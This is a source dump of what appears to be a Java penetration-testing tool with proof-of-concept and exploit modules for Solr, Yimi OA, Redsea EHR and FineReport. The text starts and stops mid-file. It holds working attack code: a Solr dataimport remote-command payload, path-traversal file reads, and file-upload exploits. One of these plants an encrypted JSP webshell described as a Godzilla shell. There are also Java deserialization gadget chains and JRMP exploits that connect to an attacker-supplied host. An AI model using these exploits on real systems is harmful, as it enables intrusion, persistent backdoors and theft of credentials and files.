"/solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22"+command+"%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20"; 45 | String requestData = " \n \n "; 46 | 47 | switch (type){ 48 | case POC: 49 | HttpRequest httpRequest = new HttpRequest(target+url); 50 | httpRequest.addHeaders("Accept","*/*"); 51 | httpRequest.addHeaders("Content-Type", "application/xml"); 52 | httpRequest.addHeaders("Content-Length","40"); 53 | Response result = httpRequest.Post(requestData); 54 | 55 | if (result.statusCode == 200 && result.responseBody.contains("xml version=\"1.0")){ 56 | try { 57 | DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder(); 58 | ByteArrayInputStream input = new ByteArrayInputStream(result.responseBody.getBytes("UTF-8")); 59 | Document document = builder.parse(input); 60 | // 提取命令执行的内容 61 | NodeList nodeList = document.getElementsByTagName("arr"); 62 | 63 | for (int i = 0; i < nodeList.getLength(); i++) { 64 | Element element = (Element) nodeList.item(i); 65 | if ("title".equals(element.getAttribute("name"))) { 66 | Node strNode = element.getElementsByTagName("str").item(0); 67 | String content = strNode.getTextContent().trim(); 68 | WriteLog("\n 命令:"+content); 69 | WriteExpLog("[*] "+content); 70 | } 71 | } 72 | } catch (Exception e) { 73 | e.printStackTrace(); 74 | } 75 | WriteLog("\n[*] 存在漏洞"); 76 | 77 | WriteLog("\n[*] 切换到命令执行模块执行其他命令"); 78 | 79 | }else { 80 | WriteLog("\n[*] 不存在漏洞"); 81 | } 82 | case EXP: 83 | } 84 | } 85 | 86 | } 87 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/YimiController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "一米OA") 10 | public class YimiController extends Controller implements BasicController{ 11 | 12 | @VulnerabilityDescriptionMapping(Description="一米OA getfile.jsp 任意文件读取漏洞" ,SupportVulType= SupportVul.信息泄露) 13 | public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception { 14 | WriteLog("\n[*]开始检测: 一米OA getfile.jsp 任意文件读取漏洞"); 15 | 16 | switch (type){ 17 | case EXP: 18 | break; 19 | case POC: 20 | HttpRequest httpRequest = new HttpRequest(target+"/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp"); 21 | Response result = httpRequest.Get(""); 22 | if(result.responseBody.contains("import")&&result.statusCode==200){ 23 | WriteLog("\n[*] 存在漏洞"); 24 | WriteLog(result.responseBody); 25 | }else { 26 | WriteLog("\n[*] 不存在漏洞"); 27 | } 28 | WriteLog("\n[*]"+result.responseBody); 29 | } 30 | } 31 | 32 | } 33 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/ehrController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.HttpRequest; 6 | import com.achuna33.Utils.Response; 7 | import com.achuna33.Utils.Utils; 8 | @BasicMapping(uri = "红海EHR") 9 | public class ehrController extends Controller implements BasicController{ 10 | @VulnerabilityDescriptionMapping(Description="红海EHR任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile) 11 | public void vul_ehr_CVM(Poc_Exp type, String target, Object... args) throws Exception { 12 | WriteLog("\n[*]开始检测: 红海EHR任意文件上传漏洞"); 13 | String data = "------WebKitFormBoundaryQb1l0Fqa\r\n" + 14 | "Content-Disposition: form-data; name=\"OPTION\"\r\n" + 15 | "\r\n" + 16 | "{\"OPTION\":\"SAVEFILE\"}\r\n" + 17 | "------WebKitFormBoundaryQb1l0Fqa\r\n" + 18 | "Content-Disposition: form-data; name=\"FILENAME\"\r\n" + 19 | "\r\n" + 20 | "{\"FILENAME\":\"versions.txt\"}\r\n" + 21 | "------WebKitFormBoundaryQb1l0Fqa\r\n" + 22 | "Content-Disposition: form-data; name=\"file\";filename=\"versions.txt\"\r\n" + 23 | "\r\n" + 24 | "shellcode\r\n" + 25 | "------WebKitFormBoundaryQb1l0Fqa"; 26 | String url2 = "/cas/js/lib/buttons/iconfig.jsp"; 27 | String url = "/RedseaPlatform/OfficeServer"; 28 | switch (type){ 29 | case EXP: 30 | String path = null; 31 | String mypayload = null; 32 | try { 33 | path = (String) args[0]; 34 | try { 35 | byte[] bytes = Utils.readFile(path); 36 | mypayload = new String(bytes); 37 | }catch (Exception e){ 38 | WriteExpLog("\n [*] 文件读取失败"); 39 | } 40 | }catch (Exception e){ 41 | 42 | } 43 | String payload = "<%! String xc=\"3c6e0b8a9c15224a\"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }}\n" + 44 | "%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader(\"Content-Length\"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))"; 46 | 47 | if (mypayload!=null){ 48 | payload = mypayload; 49 | }else { 50 | WriteExpLog("\n [*] 默认shell 为哥斯拉shell 密码 key"); 51 | } 52 | String expshellpath = Utils.getRandomString(4)+".jsp"; 53 | // url = url.replace("iconfig.jsp",expshellpath); 54 | HttpRequest httpRequest3 = new HttpRequest(target+url); 55 | httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 56 | httpRequest3.addHeaders("X-Requested-With","XMLHttpRequest"); 57 | httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate"); 58 | httpRequest3.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa"); 59 | httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 60 | httpRequest3.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest"); 61 | data = data.replace("shellcode",payload).replace("versions.txt",expshellpath); 62 | 63 | httpRequest3.Post(data); 64 | 65 | Response result1 = new HttpRequest(target +"/uploadfile/"+expshellpath).Get(""); 66 | if(result1.statusCode==200){ 67 | WriteExpLog("\n[*] shell path:\n"+target +"/uploadfile/"+expshellpath); 68 | }else { 69 | WriteExpLog("\n 访问失败:\n"+target +"/uploadfile/"+expshellpath); 70 | WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性"); 71 | 72 | } 73 | break; 74 | case POC: 75 | String shellpath = Utils.getRandomString(4)+".txt"; 76 | String poc = "103ccba74d78db6awfererterter3c"; 77 | HttpRequest httpRequest2 = new HttpRequest(target+url); 78 | httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31"); 79 | httpRequest2.addHeaders("X-Requested-With","XMLHttpRequest"); 80 | httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate"); 81 | httpRequest2.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa"); 82 | httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9"); 83 | httpRequest2.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest"); 84 | httpRequest2.Post(data.replace("shellcode",poc).replace("versions.txt",shellpath)); 85 | Response result = new HttpRequest(target+"/uploadfile/"+shellpath).Get(""); 86 | if(result.responseBody.contains("103ccba74d78db6awfererterter3c")&&result.statusCode==200){ 87 | WriteLog("\n[*] 存在漏洞"); 88 | // WriteLog("访问:"+target +url2.replace("iconfig.jsp",shellpath)); 89 | }else { 90 | WriteLog("\n[-] 不存在漏洞"); 91 | } 92 | } 93 | } 94 | } 95 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/fineReportController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "帆软OA") 12 | public class fineReportController extends Controller implements BasicController{ 13 | 14 | @VulnerabilityDescriptionMapping(Description = "帆软报表 V9 design_save_svg 任意文件覆盖文件上传",SupportVulType = SupportVul.UploadFile) 15 | public void vul_design_save_svg(Poc_Exp type, String target, Object... args) throws MalformedURLException { 16 | WriteLog("\n[*]开始检测: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传"); 17 | String url = "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp"; 18 | String data = "{\"__CONTENT__\":\"<%out.println(\\\"Hello World!\\\");%>\",\"__CHARSET__\":\"UTF-8\"}"; 19 | switch (type){ 20 | case EXP: 21 | new HttpRequest(target+url).Post(data); 22 | 23 | HttpRequest httpRequest2_exp = new HttpRequest(target+url); 24 | Response result2_exp = httpRequest2_exp.Get(""); 25 | if(result2_exp.responseBody.contains("Hello World") && result2_exp.statusCode==200){ 26 | WriteExpLog("\n[*] 存在漏洞"); 27 | }else { 28 | WriteExpLog("\n[*] 不存在漏洞"); 29 | } 30 | WriteExpLog("\n"+result2_exp.responseBody); 31 | break; 32 | case POC: 33 | new HttpRequest(target+url).Post(data); 34 | 35 | HttpRequest httpRequest2 = new HttpRequest(target+"/update.jsp"); 36 | Response result2 = httpRequest2.Get(""); 37 | if(result2.responseBody.contains("Hello World") && result2.statusCode==200){ 38 | WriteLog("\n[*] 存在漏洞"); 39 | }else { 40 | WriteLog("\n[*] 不存在漏洞"); 41 | } 42 | WriteLog("\n[*]"+result2.responseBody); 43 | } 44 | } 45 | @VulnerabilityDescriptionMapping(Description = "帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757",SupportVulType = SupportVul.信息泄露) 46 | public void vul_get_geo_json(Poc_Exp type, String target, Object... args) throws MalformedURLException{ 47 | WriteLog("\n开始检测: 帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757"); 48 | String url = "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"; 49 | switch (type){ 50 | case EXP: 51 | 52 | break; 53 | case POC: 54 | Response result2 = new HttpRequest(target+url).Get(""); 55 | if(result2.responseBody.contains("rootManagerName") && result2.statusCode==200){ 56 | WriteLog("\n[*] 存在漏洞"); 57 | String passwordEncode = result2.responseBody.split("")[1].split("")[0]; 58 | passwordEncode = passwordEncode.split("\n" + 93 | "\n" + 94 | "\n" + 95 | "\n" + 96 | "\n" + 97 | "\n" + 98 | "\n" + 99 | "\n" + 100 | "\n" + 101 | "\n" + 102 | ""; 103 | String passwordEncode = data.split("")[1].split("")[0]; 104 | passwordEncode = passwordEncode.split(" queue = new PriorityQueue(2, (Comparator) comparator); 35 | // stub data for replacement later 36 | queue.add(new BigInteger("1")); 37 | queue.add(new BigInteger("1")); 38 | 39 | // switch method called by comparator 40 | Reflections.setFieldValue(comparator, "property", "outputProperties"); 41 | 42 | // switch contents of queue 43 | final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); 44 | queueArray[0] = templates; 45 | queueArray[1] = templates; 46 | return queue; 47 | } 48 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 49 | Object queue = getObject(type,param); 50 | 51 | 52 | //序列化 53 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 54 | ObjectOutputStream oos = new ObjectOutputStream(baous); 55 | oos.writeObject(queue); 56 | byte[] bytes = baous.toByteArray(); 57 | oos.close(); 58 | return bytes; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/CommonsBeanutils2.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import com.achuna33.Gadgets.utils.Gadgets; 5 | import com.achuna33.Gadgets.utils.Reflections; 6 | import com.achuna33.SupportType.PayloadType; 7 | import com.achuna33.Utils.MyURLClassLoader; 8 | 9 | import java.io.ByteArrayOutputStream; 10 | import java.io.FileOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.math.BigInteger; 13 | import java.util.Comparator; 14 | import java.util.PriorityQueue; 15 | 16 | public class CommonsBeanutils2 { 17 | public static void main(String[] args) throws Exception { 18 | byte[] bytes = getBytes(PayloadType.command, "calc"); 19 | FileOutputStream fous = new FileOutputStream("333.ser"); 20 | fous.write(bytes); 21 | fous.close(); 22 | } 23 | public static Object getObject(PayloadType type, String... param) throws Exception{ 24 | final Object templates = Gadgets.createTemplatesImpl(type, param); 25 | // mock method name until armed 26 | MyURLClassLoader classLoader = new MyURLClassLoader("commons-beanutils-1.8.2.jar"); 27 | Class clazz = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 28 | Object comparator = clazz.getDeclaredConstructor(new Class[]{String.class}).newInstance(new Object[]{"lowestSetBit"}); 29 | 30 | 31 | // create queue with numbers and basic comparator 32 | final PriorityQueue queue = new PriorityQueue(2, (Comparator) comparator); 33 | // stub data for replacement later 34 | queue.add(new BigInteger("1")); 35 | queue.add(new BigInteger("1")); 36 | 37 | // switch method called by comparator 38 | Reflections.setFieldValue(comparator, "property", "outputProperties"); 39 | 40 | // switch contents of queue 41 | final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); 42 | queueArray[0] = templates; 43 | queueArray[1] = templates; 44 | return queue; 45 | } 46 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 47 | 48 | Object queue = getObject(type,param); 49 | 50 | //序列化 51 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 52 | ObjectOutputStream oos = new ObjectOutputStream(baous); 53 | oos.writeObject(queue); 54 | byte[] bytes = baous.toByteArray(); 55 | oos.close(); 56 | 57 | return bytes; 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/CommonsCollectionsK1.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import com.achuna33.Gadgets.utils.Gadgets; 5 | import com.achuna33.Gadgets.utils.Reflections; 6 | import com.achuna33.SupportType.PayloadType; 7 | import org.apache.commons.collections.functors.InvokerTransformer; 8 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 9 | import org.apache.commons.collections.map.LazyMap; 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.FileOutputStream; 12 | import java.io.ObjectOutputStream; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | public class CommonsCollectionsK1 { 17 | public static void main(String[] args) throws Exception { 18 | byte[] bytes = getBytes(PayloadType.command, "calc"); 19 | FileOutputStream fous = new FileOutputStream("out2222.ser"); 20 | fous.write(bytes); 21 | fous.close(); 22 | } 23 | public static Object getObject(PayloadType type, String... param) throws Exception{ 24 | Object tpl = Gadgets.createTemplatesImpl(type, param); 25 | 26 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 27 | HashMap innerMap = new HashMap(); 28 | Map m = LazyMap.decorate(innerMap, transformer); 29 | 30 | Map outerMap = new HashMap(); 31 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 32 | outerMap.put(tied, "t"); 33 | // clear the inner map data, this is important 34 | innerMap.clear(); 35 | 36 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 37 | return outerMap; 38 | } 39 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 40 | Object outerMap = getObject(type,param); 41 | //序列化 42 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 43 | ObjectOutputStream oos = new ObjectOutputStream(baous); 44 | oos.writeObject(outerMap); 45 | byte[] bytes = baous.toByteArray(); 46 | oos.close(); 47 | 48 | return bytes; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/CommonsCollectionsK2.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | import com.achuna33.Gadgets.utils.Gadgets; 4 | import com.achuna33.Gadgets.utils.Reflections; 5 | import com.achuna33.SupportType.PayloadType; 6 | import org.apache.commons.collections4.functors.InvokerTransformer; 7 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections4.map.LazyMap; 9 | import java.io.ByteArrayOutputStream; 10 | import java.io.FileOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.util.HashMap; 13 | import java.util.Map; 14 | 15 | public class CommonsCollectionsK2 { 16 | public static void main(String[] args) throws Exception { 17 | byte[] bytes = getBytes(PayloadType.command, "calc"); 18 | FileOutputStream fous = new FileOutputStream("4444.ser"); 19 | fous.write(bytes); 20 | fous.close(); 21 | } 22 | public static Object getObject(PayloadType type, String... param) throws Exception{ 23 | Object tpl = Gadgets.createTemplatesImpl(type, param); 24 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 25 | 26 | HashMap innerMap = new HashMap(); 27 | Map m = LazyMap.lazyMap(innerMap, transformer); 28 | 29 | Map outerMap = new HashMap(); 30 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 31 | outerMap.put(tied, "t"); 32 | // clear the inner map data, this is important 33 | innerMap.clear(); 34 | 35 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 36 | return outerMap; 37 | } 38 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 39 | Object outerMap = getObject(type,param); 40 | 41 | //序列化 42 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 43 | ObjectOutputStream oos = new ObjectOutputStream(baous); 44 | oos.writeObject(outerMap); 45 | byte[] bytes = baous.toByteArray(); 46 | oos.close(); 47 | 48 | return bytes; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClient.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import java.lang.reflect.Proxy; 5 | import java.rmi.registry.Registry; 6 | import java.rmi.server.ObjID; 7 | import java.rmi.server.RemoteObjectInvocationHandler; 8 | import java.util.Random; 9 | 10 | import sun.rmi.server.UnicastRef; 11 | import sun.rmi.transport.LiveRef; 12 | import sun.rmi.transport.tcp.TCPEndpoint; 13 | 14 | 15 | 16 | public class JRMPClient { 17 | 18 | public Registry getObject ( final String command ) throws Exception { 19 | 20 | String host; 21 | int port; 22 | int sep = command.indexOf(':'); 23 | if ( sep < 0 ) { 24 | port = new Random().nextInt(65535); 25 | host = command; 26 | } 27 | else { 28 | host = command.substring(0, sep); 29 | port = Integer.valueOf(command.substring(sep + 1)); 30 | } 31 | ObjID id = new ObjID(new Random().nextInt()); // RMI registry 32 | TCPEndpoint te = new TCPEndpoint(host, port); 33 | UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); 34 | RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); 35 | Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] { 36 | Registry.class 37 | }, obj); 38 | return proxy; 39 | } 40 | 41 | 42 | public static void main ( final String[] args ) throws Exception { 43 | 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClient2.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | import sun.rmi.server.UnicastRef; 4 | import sun.rmi.transport.LiveRef; 5 | import sun.rmi.transport.tcp.TCPEndpoint; 6 | 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.Field; 9 | import java.lang.reflect.Proxy; 10 | import java.rmi.server.ObjID; 11 | import java.rmi.server.RMIServerSocketFactory; 12 | import java.rmi.server.RemoteObjectInvocationHandler; 13 | import java.rmi.server.UnicastRemoteObject; 14 | import java.util.Random; 15 | 16 | @SuppressWarnings ( { 17 | "restriction" 18 | } ) 19 | public class JRMPClient2 { 20 | 21 | //https://github.com/hex0wn/learn-java-bug/blob/2861e0a7f3769dc1383b12c2650ffd314c6d3ad2/rmi/src/main/java/org/example/EvilBind.java 22 | //bypass 8u231的Payload。 23 | // https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/ 24 | public UnicastRemoteObject getObject(String command) throws Exception { 25 | 26 | String host; 27 | int port; 28 | int sep = command.indexOf(':'); 29 | if ( sep < 0 ) { 30 | port = new Random().nextInt(65535); 31 | host = command; 32 | } 33 | else { 34 | host = command.substring(0, sep); 35 | port = Integer.valueOf(command.substring(sep + 1)); 36 | } 37 | 38 | // 1. Create a new TCPEndpoint and UnicastRef instance. 39 | // The TCPEndpoint contains the IP/port of the attacker 40 | // Taken from Moritz Bechlers JRMP Client 41 | ObjID id = new ObjID(new Random().nextInt()); // RMI registry 42 | 43 | TCPEndpoint te = new TCPEndpoint(host, port); 44 | UnicastRef refObject = new UnicastRef(new LiveRef(id, te, false)); 45 | 46 | // 2. Create a new instance of RemoteObjectInvocationHandler, 47 | // passing the RemoteRef object (refObject) with the attacker controlled IP/port in the constructor 48 | RemoteObjectInvocationHandler myInvocationHandler = new RemoteObjectInvocationHandler(refObject); 49 | 50 | // 3. Create a dynamic proxy class that implements the classes/interfaces RMIServerSocketFactory 51 | // and Remote and passes all incoming calls to the invoke method of the 52 | // RemoteObjectInvocationHandler 53 | RMIServerSocketFactory handcraftedSSF = (RMIServerSocketFactory) Proxy.newProxyInstance( 54 | RMIServerSocketFactory.class.getClassLoader(), 55 | new Class[] { RMIServerSocketFactory.class, java.rmi.Remote.class }, 56 | myInvocationHandler); 57 | 58 | // 4. Create a new UnicastRemoteObject instance by using Reflection 59 | // Make the constructor public 60 | Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor(null); 61 | constructor.setAccessible(true); 62 | UnicastRemoteObject myRemoteObject = (UnicastRemoteObject) constructor.newInstance(null); 63 | 64 | // 5. Make the ssf instance accessible (again by using Reflection) and set it to the proxy object 65 | Field privateSsfField = UnicastRemoteObject.class.getDeclaredField("ssf"); 66 | privateSsfField.setAccessible(true); 67 | 68 | // 6. Set the ssf instance of the UnicastRemoteObject to our proxy 69 | privateSsfField.set(myRemoteObject, handcraftedSSF); 70 | 71 | // return the gadget 72 | return myRemoteObject; 73 | } 74 | public static void main ( final String[] args) throws Exception { 75 | Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader()); 76 | //PayloadRunner.run(JRMPClient2.class, new String[]{"127.0.0.1:1099"} ); 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/JRMPClientExploit.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import java.io.DataOutputStream; 5 | import java.io.IOException; 6 | import java.io.ObjectOutputStream; 7 | import java.io.OutputStream; 8 | import java.net.InetSocketAddress; 9 | import java.net.Socket; 10 | import java.net.SocketException; 11 | import java.net.URL; 12 | import java.net.URLClassLoader; 13 | import java.net.UnknownHostException; 14 | 15 | import javax.net.SocketFactory; 16 | 17 | import sun.rmi.transport.TransportConstants; 18 | 19 | 20 | 21 | public class JRMPClientExploit { 22 | 23 | public static final void main ( final String[] args ) { 24 | // if ( args.length < 4 ) { 25 | // System.err.println(JRMPClientExploit.class.getName() + " "); 26 | // System.exit(-1); 27 | // } 28 | // 29 | // Object payloadObject = Utils.makePayloadObject(args[2], args[3]); 30 | // String hostname = args[ 0 ]; 31 | // int port = Integer.parseInt(args[ 1 ]); 32 | // try { 33 | // System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port)); 34 | // makeDGCCall(hostname, port, payloadObject); 35 | // } 36 | // catch ( Exception e ) { 37 | // e.printStackTrace(System.err); 38 | // } 39 | // Utils.releasePayload(args[2], payloadObject); 40 | } 41 | 42 | public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException, UnknownHostException, SocketException { 43 | InetSocketAddress isa = new InetSocketAddress(hostname, port); 44 | Socket s = null; 45 | DataOutputStream dos = null; 46 | try { 47 | s = SocketFactory.getDefault().createSocket(hostname, port); 48 | s.setKeepAlive(true); 49 | s.setTcpNoDelay(true); 50 | 51 | OutputStream os = s.getOutputStream(); 52 | dos = new DataOutputStream(os); 53 | 54 | dos.writeInt(TransportConstants.Magic); 55 | dos.writeShort(TransportConstants.Version); 56 | dos.writeByte(TransportConstants.SingleOpProtocol); 57 | 58 | dos.write(TransportConstants.Call); 59 | 60 | @SuppressWarnings ( "resource" ) 61 | final ObjectOutputStream objOut = new MarshalOutputStream(dos); 62 | 63 | objOut.writeLong(2); // DGC 64 | objOut.writeInt(0); 65 | objOut.writeLong(0); 66 | objOut.writeShort(0); 67 | 68 | objOut.writeInt(1); // dirty 69 | objOut.writeLong(-669196253586618813L); 70 | 71 | objOut.writeObject(payloadObject); 72 | 73 | os.flush(); 74 | } 75 | finally { 76 | if ( dos != null ) { 77 | dos.close(); 78 | } 79 | if ( s != null ) { 80 | s.close(); 81 | } 82 | } 83 | } 84 | 85 | static final class MarshalOutputStream extends ObjectOutputStream { 86 | 87 | 88 | private URL sendUrl; 89 | 90 | public MarshalOutputStream (OutputStream out, URL u) throws IOException { 91 | super(out); 92 | this.sendUrl = u; 93 | } 94 | 95 | MarshalOutputStream ( OutputStream out ) throws IOException { 96 | super(out); 97 | } 98 | 99 | @Override 100 | protected void annotateClass ( Class cl ) throws IOException { 101 | if ( this.sendUrl != null ) { 102 | writeObject(this.sendUrl.toString()); 103 | } else if ( ! ( cl.getClassLoader() instanceof URLClassLoader ) ) { 104 | writeObject(null); 105 | } 106 | else { 107 | URL[] us = ( (URLClassLoader) cl.getClassLoader() ).getURLs(); 108 | String cb = ""; 109 | 110 | for ( URL u : us ) { 111 | cb += u.toString(); 112 | } 113 | writeObject(cb); 114 | } 115 | } 116 | 117 | 118 | /** 119 | * Serializes a location from which to load the specified class. 120 | */ 121 | @Override 122 | protected void annotateProxyClass ( Class cl ) throws IOException { 123 | annotateClass(cl); 124 | } 125 | } 126 | 127 | 128 | } 129 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/Jdk7u21.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | 5 | import com.achuna33.Gadgets.utils.Gadgets; 6 | import com.achuna33.Gadgets.utils.Reflections; 7 | import com.achuna33.SupportType.PayloadType; 8 | 9 | import javax.xml.transform.Templates; 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.lang.reflect.InvocationHandler; 13 | import java.util.HashMap; 14 | import java.util.LinkedHashSet; 15 | 16 | public class Jdk7u21 { 17 | 18 | public static Object getObject(PayloadType type, String... param) throws Exception{ 19 | final Object templates = Gadgets.createTemplatesImpl(type, param); 20 | 21 | String zeroHashCodeStr = "f5a5a608"; 22 | 23 | HashMap map = new HashMap(); 24 | map.put(zeroHashCodeStr, "foo"); 25 | 26 | InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 27 | Reflections.setFieldValue(tempHandler, "type", Templates.class); 28 | Templates proxy = Gadgets.createProxy(tempHandler, Templates.class); 29 | 30 | LinkedHashSet set = new LinkedHashSet(); // maintain order 31 | set.add(templates); 32 | set.add(proxy); 33 | 34 | Reflections.setFieldValue(templates, "_auxClasses", null); 35 | Reflections.setFieldValue(templates, "_class", null); 36 | 37 | map.put(zeroHashCodeStr, templates); // swap in real object 38 | return set; 39 | } 40 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 41 | Object set = 